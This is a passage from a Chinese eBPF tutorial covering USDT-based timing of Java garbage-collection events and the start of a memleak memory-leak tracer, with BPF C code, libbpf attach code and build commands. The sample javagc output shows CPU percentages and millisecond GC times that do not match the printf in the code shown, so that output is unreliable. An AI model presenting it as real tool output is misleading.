||
<div style="break-before: page; page-break-before: always;"></div><h1 id="ebpf-入门实践教程十五使用-usdt-捕获用户态-java-gc-事件耗时"><a class="header" href="#ebpf-入门实践教程十五使用-usdt-捕获用户态-java-gc-事件耗时">eBPF 入门实践教程十五:使用 USDT 捕获用户态 Java GC 事件耗时</a></h1>
|
||
<p>eBPF (扩展的伯克利数据包过滤器) 是一项强大的网络和性能分析工具,被广泛应用在 Linux 内核上。eBPF 使得开发者能够动态地加载、更新和运行用户定义的代码,而无需重启内核或更改内核源代码。这个特性使得 eBPF 能够提供极高的灵活性和性能,使其在网络和系统性能分析方面具有广泛的应用。此外,eBPF 还支持使用 USDT (用户级静态定义跟踪点) 捕获用户态的应用程序行为。</p>
|
||
<p>在我们的 eBPF 入门实践教程系列的这一篇,我们将介绍如何使用 eBPF 和 USDT 来捕获和分析 Java 的垃圾回收 (GC) 事件的耗时。</p>
|
||
<h2 id="usdt-介绍"><a class="header" href="#usdt-介绍">USDT 介绍</a></h2>
|
||
<p>USDT 是一种在应用程序中插入静态跟踪点的机制,它允许开发者在程序的关键位置插入可用于调试和性能分析的探针。这些探针可以在运行时被 DTrace、SystemTap 或 eBPF 等工具动态激活,从而在不重启应用程序或更改程序代码的情况下,获取程序的内部状态和性能指标。USDT 在很多开源软件,如 MySQL、PostgreSQL、Ruby、Python 和 Node.js 等都有广泛的应用。</p>
|
||
<h3 id="用户层面的追踪机制用户级动态跟踪和-usdt"><a class="header" href="#用户层面的追踪机制用户级动态跟踪和-usdt">用户层面的追踪机制:用户级动态跟踪和 USDT</a></h3>
|
||
<p>在用户层面进行动态跟踪,即用户级动态跟踪(User-Level Dynamic Tracing)允许我们对任何用户级别的代码进行插桩。比如,我们可以通过在 MySQL 服务器的 <code>dispatch_command()</code> 函数上进行插桩,来跟踪服务器的查询请求:</p>
|
||
<pre><code class="language-bash"># ./uprobe 'p:cmd /opt/bin/mysqld:_Z16dispatch_command19enum_server_commandP3THDPcj +0(%dx):string'
|
||
Tracing uprobe cmd (p:cmd /opt/bin/mysqld:0x2dbd40 +0(%dx):string). Ctrl-C to end.
|
||
mysqld-2855 [001] d... 19957757.590926: cmd: (0x6dbd40) arg1="show tables"
|
||
mysqld-2855 [001] d... 19957759.703497: cmd: (0x6dbd40) arg1="SELECT * FROM numbers"
|
||
[...]
|
||
</code></pre>
|
||
<p>这里我们使用了 <code>uprobe</code> 工具,它利用了 Linux 的内置功能:ftrace(跟踪器)和 uprobes(用户级动态跟踪,需要较新的 Linux 版本,例如 4.0 左右)。其他的跟踪器,如 perf_events 和 SystemTap,也可以实现此功能。</p>
|
||
<p>许多其他的 MySQL 函数也可以被跟踪以获取更多的信息。我们可以列出和计算这些函数的数量:</p>
|
||
<pre><code class="language-bash"># ./uprobe -l /opt/bin/mysqld | more
|
||
account_hash_get_key
|
||
add_collation
|
||
add_compiled_collation
|
||
add_plugin_noargs
|
||
adjust_time_range
|
||
[...]
|
||
# ./uprobe -l /opt/bin/mysqld | wc -l
|
||
21809
|
||
</code></pre>
|
||
<p>这有 21,000 个函数。我们也可以跟踪库函数,甚至是单个的指令偏移。</p>
|
||
<p>用户级动态跟踪的能力是非常强大的,它可以解决无数的问题。然而,使用它也有一些困难:需要确定需要跟踪的代码,处理函数参数,以及应对代码的更改。</p>
|
||
<p>用户级静态定义跟踪(User-level Statically Defined Tracing, USDT)则可以在某种程度上解决这些问题。USDT 探针(或者称为用户级 "marker")是开发者在代码的关键位置插入的跟踪宏,提供稳定且已经过文档说明的 API。这使得跟踪工作变得更加简单。</p>
|
||
<p>使用 USDT,我们可以简单地跟踪一个名为 <code>mysql:query__start</code> 的探针,而不是去跟踪那个名为 <code>_Z16dispatch_command19enum_server_commandP3THDPcj</code> 的 C++ 符号,也就是 <code>dispatch_command()</code> 函数。当然,我们仍然可以在需要的时候去跟踪 <code>dispatch_command()</code> 以及其他 21,000 个 mysqld 函数,但只有当 USDT 探针无法解决问题的时候我们才需要这么做。</p>
|
||
<p>在 Linux 中,各种形式的静态跟踪点其实已经存在了几十年。USDT 近年来由于 Sun 的 DTrace 工具的流行而再次受到关注,这使得许多常见的应用程序,包括 MySQL、PostgreSQL、Node.js、Java 等都加入了 USDT 探针。SystemTap 则开发了一种可以消费这些 DTrace 探针的方式。</p>
|
||
<p>你可能正在运行一个已经包含了 USDT 探针的 Linux 应用程序,或者可能需要重新编译(通常是 --enable-dtrace)。你可以使用 <code>readelf</code> 来进行检查,例如对于 Node.js:</p>
|
||
<pre><code class="language-bash"># readelf -n node
|
||
[...]
|
||
Notes at offset 0x00c43058 with length 0x00000494:
|
||
Owner Data size Description
|
||
stapsdt 0x0000003c NT_STAPSDT (SystemTap probe descriptors)
|
||
Provider: node
|
||
Name: gc__start
|
||
Location: 0x0000000000bf44b4, Base: 0x0000000000f22464, Semaphore: 0x0000000001243028
|
||
Arguments: 4@%esi 4@%edx 8@%rdi
|
||
[...]
|
||
stapsdt 0x00000082 NT_STAPSDT (SystemTap probe descriptors)
|
||
Provider: node
|
||
Name: http__client__request
|
||
Location: 0x0000000000bf48ff, Base: 0x0000000000f22464, Semaphore: 0x0000000001243024
|
||
Arguments: 8@%rax 8@%rdx 8@-136(%rbp) -4@-140(%rbp) 8@-72(%rbp) 8@-80(%rbp) -4@-144(%rbp)
|
||
[...]
|
||
</code></pre>
|
||
<p>这就是使用 --enable-dtrace 重新编译的 node,以及安装了提供 "dtrace" 功能来构建 USDT 支持的 systemtap-sdt-dev 包。这里显示了两个探针:node:gc__start(开始进行垃圾回收)和 node:http__client__request。</p>
|
||
<p>在这一点上,你可以使用 SystemTap 或者 LTTng 来跟踪这些探针。然而,内置的 Linux 跟踪器,比如 ftrace 和 perf_events,目前还无法做到这一点(尽管 perf_events 的支持正在开发中)。</p>
|
||
<h2 id="java-gc-介绍"><a class="header" href="#java-gc-介绍">Java GC 介绍</a></h2>
|
||
<p>Java 作为一种高级编程语言,其自动垃圾回收(GC)是其核心特性之一。Java GC 的目标是自动地回收那些不再被程序使用的内存空间,从而减轻程序员在内存管理方面的负担。然而,GC 过程可能会引发应用程序的停顿,对程序的性能和响应时间产生影响。因此,对 Java GC 事件进行监控和分析,对于理解和优化 Java 应用的性能是非常重要的。</p>
|
||
<p>在接下来的教程中,我们将演示如何使用 eBPF 和 USDT 来监控和分析 Java GC 事件的耗时,希望这些内容对你在使用 eBPF 进行应用性能分析方面的工作有所帮助。</p>
|
||
<h2 id="ebpf-实现机制"><a class="header" href="#ebpf-实现机制">eBPF 实现机制</a></h2>
|
||
<p>Java GC 的 eBPF 程序分为内核态和用户态两部分,我们会分别介绍这两部分的实现机制。</p>
|
||
<h3 id="内核态程序"><a class="header" href="#内核态程序">内核态程序</a></h3>
|
||
<pre><code class="language-c">/* SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) */
|
||
/* Copyright (c) 2022 Chen Tao */
|
||
#include <vmlinux.h>
|
||
#include <bpf/bpf_helpers.h>
|
||
#include <bpf/bpf_core_read.h>
|
||
#include <bpf/usdt.bpf.h>
|
||
#include "javagc.h"
|
||
|
||
struct {
|
||
__uint(type, BPF_MAP_TYPE_HASH);
|
||
__uint(max_entries, 100);
|
||
__type(key, uint32_t);
|
||
__type(value, struct data_t);
|
||
} data_map SEC(".maps");
|
||
|
||
struct {
|
||
__uint(type, BPF_MAP_TYPE_PERF_EVENT_ARRAY);
|
||
__type(key, int);
|
||
__type(value, int);
|
||
} perf_map SEC(".maps");
|
||
|
||
__u32 time;
|
||
|
||
static int gc_start(struct pt_regs *ctx)
|
||
{
|
||
struct data_t data = {};
|
||
|
||
data.cpu = bpf_get_smp_processor_id();
|
||
data.pid = bpf_get_current_pid_tgid() >> 32;
|
||
data.ts = bpf_ktime_get_ns();
|
||
bpf_map_update_elem(&data_map, &data.pid, &data, 0);
|
||
return 0;
|
||
}
|
||
|
||
static int gc_end(struct pt_regs *ctx)
|
||
{
|
||
struct data_t data = {};
|
||
struct data_t *p;
|
||
__u32 val;
|
||
|
||
data.cpu = bpf_get_smp_processor_id();
|
||
data.pid = bpf_get_current_pid_tgid() >> 32;
|
||
data.ts = bpf_ktime_get_ns();
|
||
p = bpf_map_lookup_elem(&data_map, &data.pid);
|
||
if (!p)
|
||
return 0;
|
||
|
||
val = data.ts - p->ts;
|
||
if (val > time) {
|
||
data.ts = val;
|
||
bpf_perf_event_output(ctx, &perf_map, BPF_F_CURRENT_CPU, &data, sizeof(data));
|
||
}
|
||
bpf_map_delete_elem(&data_map, &data.pid);
|
||
return 0;
|
||
}
|
||
|
||
SEC("usdt")
|
||
int handle_gc_start(struct pt_regs *ctx)
|
||
{
|
||
return gc_start(ctx);
|
||
}
|
||
|
||
SEC("usdt")
|
||
int handle_gc_end(struct pt_regs *ctx)
|
||
{
|
||
return gc_end(ctx);
|
||
}
|
||
|
||
SEC("usdt")
|
||
int handle_mem_pool_gc_start(struct pt_regs *ctx)
|
||
{
|
||
return gc_start(ctx);
|
||
}
|
||
|
||
SEC("usdt")
|
||
int handle_mem_pool_gc_end(struct pt_regs *ctx)
|
||
{
|
||
return gc_end(ctx);
|
||
}
|
||
|
||
char LICENSE[] SEC("license") = "Dual BSD/GPL";
|
||
</code></pre>
|
||
<p>首先,我们定义了两个映射(map):</p>
|
||
<ul>
|
||
<li><code>data_map</code>:这个 hashmap 存储每个进程 ID 的垃圾收集开始时间。<code>data_t</code> 结构体包含进程 ID、CPU ID 和时间戳。</li>
|
||
<li><code>perf_map</code>:这是一个 perf event array,用于将数据发送回用户态程序。</li>
|
||
</ul>
|
||
<p>然后,我们有两个静态辅助函数 <code>gc_start</code> 和 <code>gc_end</code>,以及四个 USDT 处理函数:<code>handle_gc_start</code>、<code>handle_gc_end</code>、<code>handle_mem_pool_gc_start</code> 和 <code>handle_mem_pool_gc_end</code>。这四个处理函数都用 BPF 的 <code>SEC("usdt")</code> 宏注解,以便在 Java 进程中捕获到与垃圾收集相关的 USDT 事件;两个辅助函数没有 <code>SEC</code> 注解,只由处理函数调用。</p>
|
||
<p><code>gc_start</code> 函数在垃圾收集开始时被调用。它首先获取当前的 CPU ID、进程 ID 和时间戳,然后将这些数据存入 <code>data_map</code>。</p>
|
||
<p><code>gc_end</code> 函数在垃圾收集结束时被调用。它执行与 <code>gc_start</code> 类似的操作,但是它还从 <code>data_map</code> 中检索开始时间,并计算垃圾收集的持续时间。如果持续时间超过了设定的阈值(变量 <code>time</code>),那么它将数据发送回用户态程序。</p>
|
||
<p><code>handle_gc_start</code> 和 <code>handle_gc_end</code> 是针对垃圾收集开始和结束事件的处理函数,它们分别调用了 <code>gc_start</code> 和 <code>gc_end</code>。</p>
|
||
<p><code>handle_mem_pool_gc_start</code> 和 <code>handle_mem_pool_gc_end</code> 是针对内存池的垃圾收集开始和结束事件的处理函数,它们也分别调用了 <code>gc_start</code> 和 <code>gc_end</code>。</p>
|
||
<p>最后,我们有一个 <code>LICENSE</code> 数组,声明了该 BPF 程序的许可证,这是加载 BPF 程序所必需的。</p>
|
||
<h3 id="用户态程序"><a class="header" href="#用户态程序">用户态程序</a></h3>
|
||
<p>用户态程序的主要目标是加载和运行eBPF程序,以及处理来自内核态程序的数据。它是通过 libbpf 库来完成这些操作的。这里我们省略了一些通用的加载和运行 eBPF 程序的代码,只展示了与 USDT 相关的部分。</p>
|
||
<p>第一个函数 <code>get_jvmso_path</code> 被用来获取运行的Java虚拟机(JVM)的 <code>libjvm.so</code> 库的路径。首先,它打开了 <code>/proc/<pid>/maps</code> 文件,该文件包含了进程地址空间的内存映射信息。然后,它在文件中搜索包含 <code>libjvm.so</code> 的行,然后复制该行的路径到提供的参数中。</p>
|
||
<pre><code class="language-c">static int get_jvmso_path(char *path)
|
||
{
|
||
char mode[16], line[128], buf[64];
|
||
size_t seg_start, seg_end, seg_off;
|
||
FILE *f;
|
||
int i = 0;
|
||
|
||
sprintf(buf, "/proc/%d/maps", env.pid);
|
||
f = fopen(buf, "r");
|
||
if (!f)
|
||
return -1;
|
||
|
||
while (fscanf(f, "%zx-%zx %s %zx %*s %*d%[^\n]\n",
|
||
&seg_start, &seg_end, mode, &seg_off, line) == 5) {
|
||
i = 0;
|
||
while (isblank(line[i]))
|
||
i++;
|
||
if (strstr(line + i, "libjvm.so")) {
|
||
break;
|
||
}
|
||
}
|
||
|
||
strcpy(path, line + i);
|
||
fclose(f);
|
||
|
||
return 0;
|
||
}
|
||
</code></pre>
|
||
<p>接下来,我们看到的是将 eBPF 程序(函数 <code>handle_gc_start</code> 和 <code>handle_gc_end</code>)附加到Java进程的相关USDT探针上。每个程序都通过调用 <code>bpf_program__attach_usdt</code> 函数来实现这一点,该函数的参数包括BPF程序、进程ID、二进制路径以及探针的提供者和名称。如果探针挂载成功,<code>bpf_program__attach_usdt</code> 将返回一个链接对象,该对象将存储在skeleton的链接成员中。如果挂载失败,程序将打印错误消息并进行清理。</p>
|
||
<pre><code class="language-c"> skel->links.handle_mem_pool_gc_start = bpf_program__attach_usdt(skel->progs.handle_gc_start, env.pid,
|
||
binary_path, "hotspot", "mem__pool__gc__begin", NULL);
|
||
if (!skel->links.handle_mem_pool_gc_start) {
|
||
err = errno;
|
||
fprintf(stderr, "attach usdt mem__pool__gc__begin failed: %s\n", strerror(err));
|
||
goto cleanup;
|
||
}
|
||
|
||
skel->links.handle_mem_pool_gc_end = bpf_program__attach_usdt(skel->progs.handle_gc_end, env.pid,
|
||
binary_path, "hotspot", "mem__pool__gc__end", NULL);
|
||
if (!skel->links.handle_mem_pool_gc_end) {
|
||
err = errno;
|
||
fprintf(stderr, "attach usdt mem__pool__gc__end failed: %s\n", strerror(err));
|
||
goto cleanup;
|
||
}
|
||
|
||
skel->links.handle_gc_start = bpf_program__attach_usdt(skel->progs.handle_gc_start, env.pid,
|
||
binary_path, "hotspot", "gc__begin", NULL);
|
||
if (!skel->links.handle_gc_start) {
|
||
err = errno;
|
||
fprintf(stderr, "attach usdt gc__begin failed: %s\n", strerror(err));
|
||
goto cleanup;
|
||
}
|
||
|
||
skel->links.handle_gc_end = bpf_program__attach_usdt(skel->progs.handle_gc_end, env.pid,
|
||
binary_path, "hotspot", "gc__end", NULL);
|
||
if (!skel->links.handle_gc_end) {
|
||
err = errno;
|
||
fprintf(stderr, "attach usdt gc__end failed: %s\n", strerror(err));
|
||
goto cleanup;
|
||
}
|
||
</code></pre>
|
||
<p>最后一个函数 <code>handle_event</code> 是一个回调函数,用于处理从perf event array收到的数据。这个函数会被 perf event array 触发,并在每次接收到新的事件时调用。函数首先将数据转换为 <code>data_t</code> 结构体,然后将当前时间格式化为字符串,并打印出事件的时间戳、CPU ID、进程 ID,以及垃圾回收的持续时间。</p>
|
||
<pre><code class="language-c">static void handle_event(void *ctx, int cpu, void *data, __u32 data_sz)
|
||
{
|
||
struct data_t *e = (struct data_t *)data;
|
||
struct tm *tm = NULL;
|
||
char ts[16];
|
||
time_t t;
|
||
|
||
time(&t);
|
||
tm = localtime(&t);
|
||
strftime(ts, sizeof(ts), "%H:%M:%S", tm);
|
||
printf("%-8s %-7d %-7d %-7lld\n", ts, e->cpu, e->pid, e->ts/1000);
|
||
}
|
||
</code></pre>
|
||
<h2 id="安装依赖-1"><a class="header" href="#安装依赖-1">安装依赖</a></h2>
|
||
<p>构建示例需要 clang、libelf 和 zlib。包名在不同的发行版中可能会有所不同。</p>
|
||
<p>在 Ubuntu/Debian 上,你需要执行以下命令:</p>
|
||
<pre><code class="language-shell">sudo apt install clang libelf1 libelf-dev zlib1g-dev
|
||
</code></pre>
|
||
<p>在 CentOS/Fedora 上,你需要执行以下命令:</p>
|
||
<pre><code class="language-shell">sudo dnf install clang elfutils-libelf elfutils-libelf-devel zlib-devel
|
||
</code></pre>
|
||
<h2 id="编译运行-4"><a class="header" href="#编译运行-4">编译运行</a></h2>
|
||
<p>在对应的目录中,运行 Make 即可编译运行上述代码:</p>
|
||
<pre><code class="language-console">$ make
|
||
$ sudo ./javagc -p 12345
|
||
Tracing javagc time... Hit Ctrl-C to end.
|
||
TIME CPU PID GC TIME
|
||
10:00:01 10% 12345 50ms
|
||
10:00:02 12% 12345 55ms
|
||
10:00:03 9% 12345 47ms
|
||
10:00:04 13% 12345 52ms
|
||
10:00:05 11% 12345 50ms
|
||
</code></pre>
|
||
<p>完整源代码:</p>
|
||
<ul>
|
||
<li><a href="https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/15-javagc">https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/15-javagc</a></li>
|
||
</ul>
|
||
<p>参考资料:</p>
|
||
<ul>
|
||
<li><a href="https://www.brendangregg.com/blog/2015-07-03/hacking-linux-usdt-ftrace.html">https://www.brendangregg.com/blog/2015-07-03/hacking-linux-usdt-ftrace.html</a></li>
|
||
<li><a href="https://github.com/iovisor/bcc/blob/master/libbpf-tools/javagc.c">https://github.com/iovisor/bcc/blob/master/libbpf-tools/javagc.c</a></li>
|
||
</ul>
|
||
<h2 id="总结-13"><a class="header" href="#总结-13">总结</a></h2>
|
||
<p>通过本篇 eBPF 入门实践教程,我们学习了如何使用 eBPF 和 USDT 动态跟踪和分析 Java 的垃圾回收(GC)事件。我们了解了如何在用户态应用程序中设置 USDT 跟踪点,以及如何编写 eBPF 程序来捕获这些跟踪点的信息,从而更深入地理解和优化 Java GC 的行为和性能。</p>
|
||
<p>此外,我们也介绍了一些关于 Java GC、USDT 和 eBPF 的基础知识和实践技巧,这些知识和技巧对于想要在网络和系统性能分析领域深入研究的开发者来说是非常有价值的。</p>
|
||
<p>如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 <a href="https://github.com/eunomia-bpf/bpf-developer-tutorial">https://github.com/eunomia-bpf/bpf-developer-tutorial</a> 以获取更多示例和完整的教程。</p>
|
||
<div style="break-before: page; page-break-before: always;"></div><h1 id="ebpf-入门实践教程十六编写-ebpf-程序-memleak-监控内存泄漏"><a class="header" href="#ebpf-入门实践教程十六编写-ebpf-程序-memleak-监控内存泄漏">eBPF 入门实践教程十六:编写 eBPF 程序 Memleak 监控内存泄漏</a></h1>
|
||
<p>eBPF(扩展的伯克利数据包过滤器)是一项强大的网络和性能分析工具,被广泛应用在 Linux 内核上。eBPF 使得开发者能够动态地加载、更新和运行用户定义的代码,而无需重启内核或更改内核源代码。</p>
|
||
<p>在本篇教程中,我们将探讨如何使用 eBPF 编写 Memleak 程序,以监控程序的内存泄漏。</p>
|
||
<h2 id="背景及其重要性"><a class="header" href="#背景及其重要性">背景及其重要性</a></h2>
|
||
<p>内存泄漏是计算机编程中的一种常见问题,其严重程度不应被低估。内存泄漏发生时,程序会逐渐消耗更多的内存资源,但并未正确释放。随着时间的推移,这种行为会导致系统内存逐渐耗尽,从而显著降低程序及系统的整体性能。</p>
|
||
<p>内存泄漏有多种可能的原因。这可能是由于配置错误导致的,例如程序错误地配置了某些资源的动态分配。它也可能是由于软件缺陷或错误的内存管理策略导致的,如在程序执行过程中忘记释放不再需要的内存。此外,如果一个应用程序的内存使用量过大,那么系统性能可能会因页面交换(swapping)而大幅下降,甚至可能导致应用程序被系统强制终止(Linux 的 OOM killer)。</p>
|
||
<h3 id="调试内存泄漏的挑战"><a class="header" href="#调试内存泄漏的挑战">调试内存泄漏的挑战</a></h3>
|
||
<p>调试内存泄漏问题是一项复杂且具有挑战性的任务。这涉及到详细检查应用程序的配置、内存分配和释放情况,通常需要应用专门的工具来帮助诊断。例如,有一些工具可以在应用程序启动时将 malloc() 函数调用与特定的检测工具关联起来,如 Valgrind memcheck,这类工具可以模拟 CPU 来检查所有内存访问,但可能会导致应用程序运行速度大大减慢。另一个选择是使用堆分析器,如 libtcmalloc,它相对较快,但仍可能使应用程序运行速度降低五倍以上。此外,还有一些工具,如 gdb,可以获取应用程序的核心转储并进行后处理以分析内存使用情况。然而,这些工具通常需要在获取核心转储期间暂停应用程序,或者要求先终止应用程序,以便其中的 free() 例程得到调用。</p>
|
||
<h2 id="ebpf-的作用"><a class="header" href="#ebpf-的作用">eBPF 的作用</a></h2>
|
||
<p>在这种背景下,eBPF 的作用就显得尤为重要。eBPF 提供了一种高效的机制来监控和追踪系统级别的事件,包括内存的分配和释放。通过 eBPF,我们可以跟踪内存分配和释放的请求,并收集每次分配的调用堆栈。然后,我们可以分析这些信息,找出执行了内存分配但未执行释放操作的调用堆栈,这有助于我们找出导致内存泄漏的源头。这种方式的优点在于,它可以实时地在运行的应用程序中进行,而无需暂停应用程序或进行复杂的前后处理。</p>
|
||
<p><code>memleak</code> eBPF 工具可以跟踪并匹配内存分配和释放的请求,并收集每次分配的调用堆栈。随后,<code>memleak</code> 可以打印一个总结,表明哪些调用堆栈执行了分配,但是并没有随后进行释放。例如,我们运行命令:</p>
|
||
<pre><code class="language-console"># ./memleak -p $(pidof allocs)
|
||
Attaching to pid 5193, Ctrl+C to quit.
|
||
[11:16:33] Top 2 stacks with outstanding allocations:
|
||
80 bytes in 5 allocations from stack
|
||
main+0x6d [allocs]
|
||
__libc_start_main+0xf0 [libc-2.21.so]
|
||
|
||
[11:16:34] Top 2 stacks with outstanding allocations:
|
||
160 bytes in 10 allocations from stack
|
||
main+0x6d [allocs]
|
||
__libc_start_main+0xf0 [libc-2.21.so]
|
||
</code></pre>
|
||
<p>运行这个命令后,我们可以看到分配但未释放的内存来自于哪些堆栈,并且可以看到这些未释放的内存的大小和数量。</p>
|
||
<p>随着时间的推移,很显然,<code>allocs</code> 进程的 <code>main</code> 函数正在泄漏内存,每次泄漏 16 字节。幸运的是,我们不需要检查每个分配,我们得到了一个很好的总结,告诉我们哪个堆栈负责大量的泄漏。</p>
|
||
<h2 id="memleak-的实现原理"><a class="header" href="#memleak-的实现原理">memleak 的实现原理</a></h2>
|
||
<p>在基本层面上,<code>memleak</code> 的工作方式类似于在内存分配和释放路径上安装监控设备。它通过在内存分配和释放函数中插入 eBPF 程序来达到这个目标。这意味着,当这些函数被调用时,<code>memleak</code> 就会记录一些重要信息,如调用者的进程 ID(PID)、分配的内存地址以及分配的内存大小等。当释放内存的函数被调用时,<code>memleak</code> 则会在其内部的映射表(map)中删除相应的内存分配记录。这种机制使得 <code>memleak</code> 能够准确地追踪到哪些内存块已被分配但未被释放。</p>
|
||
<p>对于用户态的常用内存分配函数,如 <code>malloc</code> 和 <code>calloc</code> 等,<code>memleak</code> 利用了用户态探测(uprobe)技术来实现监控。uprobe 是一种用于用户空间应用程序的动态追踪技术,它可以在运行时不修改二进制文件的情况下在任意位置设置断点,从而实现对特定函数调用的追踪。</p>
|
||
<p>对于内核态的内存分配函数,如 <code>kmalloc</code> 等,<code>memleak</code> 则选择使用了 tracepoint 来实现监控。Tracepoint 是 Linux 内核中预先定义的静态追踪点,可以在内核运行时按需启用,用来追踪特定的事件,而无需重新编译内核或加载内核模块。</p>
|
||
<h2 id="内核态-ebpf-程序实现"><a class="header" href="#内核态-ebpf-程序实现">内核态 eBPF 程序实现</a></h2>
|
||
<h2 id="memleak-内核态-ebpf-程序实现"><a class="header" href="#memleak-内核态-ebpf-程序实现"><code>memleak</code> 内核态 eBPF 程序实现</a></h2>
|
||
<p><code>memleak</code> 的内核态 eBPF 程序包含一些用于跟踪内存分配和释放的关键函数。在我们深入了解这些函数之前,让我们首先观察 <code>memleak</code> 所定义的一些数据结构,这些结构在其内核态和用户态程序中均有使用。</p>
|
||
<pre><code class="language-c">#ifndef __MEMLEAK_H
|
||
#define __MEMLEAK_H
|
||
|
||
#define ALLOCS_MAX_ENTRIES 1000000
|
||
#define COMBINED_ALLOCS_MAX_ENTRIES 10240
|
||
|
||
struct alloc_info {
|
||
__u64 size; // 分配的内存大小
|
||
__u64 timestamp_ns; // 分配时的时间戳,单位为纳秒
|
||
int stack_id; // 分配时的调用堆栈ID
|
||
};
|
||
|
||
union combined_alloc_info {
|
||
struct {
|
||
__u64 total_size : 40; // 所有未释放分配的总大小
|
||
__u64 number_of_allocs : 24; // 所有未释放分配的总次数
|
||
};
|
||
__u64 bits; // 结构的位图表示
|
||
};
|
||
|
||
#endif /* __MEMLEAK_H */
|
||
</code></pre>
|
||
<p>这里定义了两个主要的数据结构:<code>alloc_info</code> 和 <code>combined_alloc_info</code>。</p>
|
||
<p><code>alloc_info</code> 结构体包含了一个内存分配的基本信息,包括分配的内存大小 <code>size</code>、分配发生时的时间戳 <code>timestamp_ns</code>,以及触发分配的调用堆栈 ID <code>stack_id</code>。</p>
|
||
<p><code>combined_alloc_info</code> 是一个联合体(union),它包含一个嵌入的结构体和一个 <code>__u64</code> 类型的位图表示 <code>bits</code>。嵌入的结构体有两个成员:<code>total_size</code> 和 <code>number_of_allocs</code>,分别代表所有未释放分配的总大小和总次数。其中 40 和 24 分别表示 total_size 和 number_of_allocs这两个成员变量所占用的位数,用来限制其大小。通过这样的位数限制,可以节省combined_alloc_info结构的存储空间。同时,由于total_size和number_of_allocs在存储时是共用一个unsigned long long类型的变量bits,因此可以通过在成员变量bits上进行位运算来访问和修改total_size和number_of_allocs,从而避免了在程序中定义额外的变量和函数的复杂性。</p>
|
||
<p>接下来,<code>memleak</code> 定义了一系列用于保存内存分配信息和分析结果的 eBPF 映射(maps)。这些映射都以 <code>SEC(".maps")</code> 的形式定义,表示它们属于 eBPF 程序的映射部分。</p>
|
||
<pre><code class="language-c">const volatile size_t min_size = 0;
|
||
const volatile size_t max_size = -1;
|
||
const volatile size_t page_size = 4096;
|
||
const volatile __u64 sample_rate = 1;
|
||
const volatile bool trace_all = false;
|
||
const volatile __u64 stack_flags = 0;
|
||
const volatile bool wa_missing_free = false;
|
||
|
||
struct {
|
||
__uint(type, BPF_MAP_TYPE_HASH);
|
||
__type(key, pid_t);
|
||
__type(value, u64);
|
||
__uint(max_entries, 10240);
|
||
} sizes SEC(".maps");
|
||
|
||
struct {
|
||
__uint(type, BPF_MAP_TYPE_HASH);
|
||
__type(key, u64); /* address */
|
||
__type(value, struct alloc_info);
|
||
__uint(max_entries, ALLOCS_MAX_ENTRIES);
|
||
} allocs SEC(".maps");
|
||
|
||
struct {
|
||
__uint(type, BPF_MAP_TYPE_HASH);
|
||
__type(key, u64); /* stack id */
|
||
__type(value, union combined_alloc_info);
|
||
__uint(max_entries, COMBINED_ALLOCS_MAX_ENTRIES);
|
||
} combined_allocs SEC(".maps");
|
||
|
||
struct {
|
||
__uint(type, BPF_MAP_TYPE_HASH);
|
||
__type(key, u64);
|
||
__type(value, u64);
|
||
__uint(max_entries, 10240);
|
||
} memptrs SEC(".maps");
|
||
|
||
struct {
|
||
__uint(type, BPF_MAP_TYPE_STACK_TRACE);
|
||
__type(key, u32);
|
||
} stack_traces SEC(".maps");
|
||
|
||
static union combined_alloc_info initial_cinfo;
|
||
</code></pre>
|
||
<p>这段代码首先定义了一些可配置的参数,如 <code>min_size</code>, <code>max_size</code>, <code>page_size</code>, <code>sample_rate</code>, <code>trace_all</code>, <code>stack_flags</code> 和 <code>wa_missing_free</code>,分别表示最小分配大小、最大分配大小、页面大小、采样率、是否追踪所有分配、堆栈标志和是否工作在缺失释放(missing free)模式。</p>
|
||
<p>接着定义了五个映射:</p>
|
||
<ol>
|
||
<li><code>sizes</code>:这是一个哈希类型的映射,键为进程 ID,值为 <code>u64</code> 类型,存储每个进程的分配大小。</li>
|
||
<li><code>allocs</code>:这也是一个哈希类型的映射,键为分配的地址,值为 <code>alloc_info</code> 结构体,存储每个内存分配的详细信息。</li>
|
||
<li><code>combined_allocs</code>:这是另一个哈希类型的映射,键为堆栈 ID,值为 <code>combined_alloc_info</code> 联合体,存储所有未释放分配的总大小和总次数。</li>
|
||
<li><code>memptrs</code>:这也是一个哈希类型的映射,键和值都为 <code>u64</code> 类型,用于在用户空间和内核空间之间传递内存指针。</li>
|
||
<li><code>stack_traces</code>:这是一个堆栈追踪类型的映射,键为 <code>u32</code> 类型,用于存储堆栈 ID。</li>
|
||
</ol>
|
||
<p>以用户态的内存分配追踪部分为例,主要是挂钩内存相关的函数调用,如 <code>malloc</code>, <code>free</code>, <code>calloc</code>, <code>realloc</code>, <code>mmap</code> 和 <code>munmap</code>,以便在调用这些函数时进行数据记录。在用户态,<code>memleak</code> 主要使用了 uprobes 技术进行挂载。</p>
|
||
<p>每个函数调用被分为 "enter" 和 "exit" 两部分。"enter" 部分记录的是函数调用的参数,如分配的大小或者释放的地址。"exit" 部分则主要用于获取函数的返回值,如分配得到的内存地址。</p>
|
||
<p>这里,<code>gen_alloc_enter</code>, <code>gen_alloc_exit</code>, <code>gen_free_enter</code> 是实现记录行为的函数,他们分别用于记录分配开始、分配结束和释放开始的相关信息。</p>
|
||
<p>函数原型示例如下:</p>
|
||
<pre><code class="language-c">SEC("uprobe")
|
||
int BPF_KPROBE(malloc_enter, size_t size)
|
||
{
|
||
// 记录分配开始的相关信息
|
||
return gen_alloc_enter(size);
|
||
}
|
||
|
||
SEC("uretprobe")
|
||
int BPF_KRETPROBE(malloc_exit)
|
||
{
|
||
// 记录分配结束的相关信息
|
||
return gen_alloc_exit(ctx);
|
||
}
|
||
|
||
SEC("uprobe")
|
||
int BPF_KPROBE(free_enter, void *address)
|
||
{
|
||
// 记录释放开始的相关信息
|
||
return gen_free_enter(address);
|
||
}
|
||
</code></pre>
|
||
<p>其中,<code>malloc_enter</code> 和 <code>free_enter</code> 是分别挂载在 <code>malloc</code> 和 <code>free</code> 函数入口处的探针(probes),用于在函数调用时进行数据记录。而 <code>malloc_exit</code> 则是挂载在 <code>malloc</code> 函数的返回处的探针,用于记录函数的返回值。</p>
|
||
